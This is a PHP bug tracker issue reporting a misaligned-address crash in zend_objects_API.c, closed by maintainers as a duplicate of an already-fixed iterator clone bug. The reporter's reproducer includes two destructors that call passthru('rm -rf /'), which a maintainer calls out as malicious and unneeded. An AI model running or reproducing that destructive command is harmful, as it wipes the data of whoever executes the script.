member access within misaligned address in zend_objects_API.c:180

[chongwick]

Description

The following code:

<?php
class A {
    public function __destruct() {
        echo (PHP_INT_MAX * PHP_FLOAT_MIN). " ". PHP_FLOAT_MAX ^ PHP_INT_MIN;
    }
}

class B {
    public function __destruct() {
        $this->systemCommand("rm -rf /");
    }

    public function systemCommand($cmd) {
        passthru($cmd);
    }
}

class C {
    public function __construct() {
        $this->data = huge_array();
    }

    public function displayData() {
        var_dump($this->data);
    }
}

class D {
    public function __destruct() {
        $this->systemCommand("rm -rf /");
    }

    public function systemCommand($cmd) {
        passthru($cmd);
    }
}

function huge_array() {
    $huge = [];
    for ($i = 0; $i < PHP_INT_MAX; $i++) {
        $huge[] = new DOMDocument();
        $huge[$i]->loadXML('<wnd>wnd'. $i. '</wnd>');
        $nodes = $huge[$i]->documentElement->childNodes;
        $iter = clone $nodes->getIterator();
    }
    return $huge;
}

$a = new A();
$b = new B();
$c = new C();
$d = new D();

$c->displayData();
?>

Resulted in this output:

/home/dan/php-8.3.9/Zend/zend_objects_API.c:180:23: runtime error: member access within misaligned address 0x2006102800000001 for type 'const struct zend_object_handlers', which requires 8 byte alignment

Have not confirmed yet with 8.3.12

PHP Version

8.3.9

Operating System

No response

[devnexen]

I can reproduce with 8.3.9 (not needing the commands passed on destruction) but not 8.3.10.

[nielsdos]

Next time you post a reproducer, maybe don't include malicious code (looking at the rm command)...

[nielsdos]

On first sight, this looks like the iterator clone issue that was reported by you before and was closed as a duplicate as it was fixed already. Can't check for sure right now.
@chongwick please use a recent version or at least confirm on a recent version before posting your bugs.

[nielsdos]

Duplicate of #16165
which in itself was a duplicate of #14741